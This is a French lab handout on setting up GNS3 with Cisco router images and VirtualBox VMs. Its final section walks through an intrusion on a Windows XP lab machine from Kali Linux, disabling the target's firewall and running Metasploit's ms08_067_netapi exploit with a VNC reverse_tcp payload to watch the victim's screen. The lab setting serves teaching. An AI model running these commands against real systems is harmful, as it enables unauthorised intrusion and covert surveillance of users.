0% ont trouvé ce document utile (0 vote)
285 vues16 pages

TP

Ce document décrit les étapes pour configurer un environnement de test sur GNS3 avec des routeurs Cisco et une machine Windows. Il montre également comment effectuer une intrusion sur Windows XP à partir de Kali Linux via Metasploit en exploitant la faille MS08_067.
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
285 vues16 pages

TP

Ce document décrit les étapes pour configurer un environnement de test sur GNS3 avec des routeurs Cisco et une machine Windows. Il montre également comment effectuer une intrusion sur Windows XP à partir de Kali Linux via Metasploit en exploitant la faille MS08_067.
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

TP sur GNS3

Par Ingénieur MOUBITANG 655-11-28-84 / 651-58-79-78 [email protected]

GNS3 est un emulateur et non un simulateur comme Cisco Packet


1. Installation de GNS3.
- On va commencer par double cliquer sur l’application GNS3

- A un certain moment, on doit devoir cliquer sur « annuler » vu qu’on a par exemple pas la
connexion internet pour faire cette partie

- Par après on va cliquer sur « Non » puisqu’on n’a pas internet pour télécharger « Wireshark »
- Dans la prochaine étape on va encore faire « Annuler » et ensuite « Non ». On va prendre
« Non » car on n’a pas l’argent

2. Travail dans GNS3


2.1.Importation et configuration du routeur c3725
- Quand GNS3 a fini d’installer, on peut tout annuler pour commencer le travail
- On va cliquer sur « Edit », puis sur « Preferences », et enfin on selectionne « IOS routers »
- On va maintenant cliquer sur « New » et essayer d’importer un nouveau routeur dans le
projet

- On va aller dans le dossier « ATELIER » et décompresser le fichier ZIP qui s’y trouve. On va
donc sélectionner le 1er fichier et cliquer sur « Yes » après.
- On va cliquer sur « Next », on laissera le nom par défaut ; ensuite on laissera la capacité
128MiB pour la RAM par défaut
- Maintenant on va configurer les adaptateurs du routeur. Les deux derniers adaptateurs que
j’ai choisis tel que sur la figure ci-dessous, sont de adaptateurs « Fast-Ethernet »

- On va maintenant dire qu’on veut 2 ports par adaptateur du routeur en faisant ceci
- Pour terminer l’importation et la configuration de notre routeur, on va cliquer sur le bouton
« Idle-PC finder » et on clique sur « finish » pour terminer
2.2.Importation et configuration du routeur c7200
- On va cette fois sélectionner le 2ème fichier présent dans notre dossier dezippé

- On doit laisser le nom « c7200 » par défaut et ensuite laisser la RAM « 512MiB » par défaut
- On clique une fois de plus sur « Idle-PC finder »

3. Utilisation de l’IOS installé


- Commençons par tester notre router, nous devons sélectionner le router et le déposer dans
l’espace de travail.
- Ensuite on fait un clic droit sur le router et on clique sur « Start »
- On fait un autre clic droit et on clique sur « Console »

- Maintenant qu’on a pu installer windows 10 sur VirtualBox, on va commencer par le faire


voir sur GNS3
** On va cliquer sur « Edit », puis « Préférences », puis sur « VirtualsBox VMs », et enfin sur
« New »
- Pour le moment on nous propose juste un ordi, on va laisser et cliquer sur « finish »
- On va revenir sur notre interface de travail et on va porter 2 routeurs « c3725 » et on va faire
un clic droit sur chacun d’eux et sélectionner « Auto Idle-PC » ceci afin de réduire la
consommation du processeur
- On va par la suite porter notre ordi windows 10 et déposer. On obtient ceci

- Pour pouvoir connecter l’ordi à R1, on va commencer par augmenter son nombre de ports à
4 puisque le seul port que possède cet ordi pour le moment n’est pas dédié à la connexion
avec le routeur. On va donc faire un clic droit sur l’ordi, cliquer sur « configure », on
sélectionne l’onglet « Network » et on met le nombre de port à « 4 »
- Je vais maintenant sélectionner « Ethernet1 » sur l’ordi et démarrer l’ordi
TEST D’INTRUSION DEPUIS KALI LINUX SUR WINDOWS XP
1. Configuration de l’adresse IP statique sur kali
- Nano /etc/network/interfaces
- Dans le fichier de configuration on entre les valeurs ci-dessous pour configurer la carte
réseau de notre ordi kali

On va faire « ctrl + x » et taper sur la touche « Entrer »


- Ensuite on va redémarrer les services on fait
/etc/init.d/networking restart && reboot

2. Configuration de l’adresse IP sur Windows XP


- On va aller sur le poste de travail, et à partir de là on va faire un clic droit sur « Favoris
réseau »
- Par la suite on va faire un clic droit sur l’icône qui nous est présenté, et choisir « Propriétés »

- On va sélectionner « Protocole internet (TCP/IP) » et cliquer sur « Propriétés »

3. Déploiement de l’environnement d’intrusion sur kali linux


- Pour commencer, on doit d’abord veiller à ce que nos machines virtuelles puissent
communiquer en réseau. De ce fait, on va sur notre virtualbox aller configurer chaque
machine virtuelle telle que le présente la figure ci-dessous
- Pour permettre à kali de pouvoir voir windows xp, on doit aller désactiver le parefeu de
windows.
** De ce fait, on va faire un clic sur l’icône du bouclier rouge qui se trouve sur la barre de
menu windows
** Ensuite on va cliquer sur « Pare-feu windows »
** On va cliquer sur « Désactivé » et enfin sur « OK »

- Sur kali on doit d’abord vérifier que nos 2 machines virtuelles communiquent. La figure ci-
dessous montre bien que nos machines sont en communication. Mais essayons de ne pas
désactiver le pare-feu de windows pour voir si ces 2 machines vont toujours communiquer
- Sur kali on va faire « msfconsole » au niveau du terminal. Ceci va activer « MetaSploit »

- On va lancer la recherche de faille sur windows XP avec la commande « msf > search
netapi »
- Si on regarde avec attention cette ligne que j’ai selectionné, on verra que c’est elle qu’on
utilisera pour tenter notre intrusion sur windows xp.
** On va taper la commande « msf > use exploit/windows/smb/ms08_067_netapi »
** On va maintenant faire « msf > show payloads » pour voir la somme des charges

- On va maintenant exécuter les commande qui nous permettront d’espionner tout qu’on
fait sur windows
** msf > set payload windows/vncinject/reverse_tcp
** msf > set rhost 172.16.16.2 pour remote la machine distance (windows XP)
** msf > set lhost 172.16.16.1 pour localhost pour kali
** on va maintenant entre msf > run
- Voici donc le résultat de notre 1ère intrusion : espionner la machine windows xp à partir de
kali linux

Vous aimerez peut-être aussi